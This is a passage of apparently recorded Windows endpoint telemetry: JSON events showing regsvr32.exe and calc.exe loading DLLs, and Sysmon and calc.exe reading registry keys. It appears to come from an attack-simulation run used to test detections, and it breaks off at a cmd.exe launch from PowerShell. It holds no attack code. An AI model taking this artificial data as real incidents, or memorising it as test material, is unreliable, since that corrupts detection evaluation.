"{42FC7E13-CBCC-5C05-0000-001066605401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\System32\\AcLayers.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\System32\\sfc_os.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242920000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242920000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242920000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "wininet.dll", + "image_path": "C:\\Windows\\System32\\wininet.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": 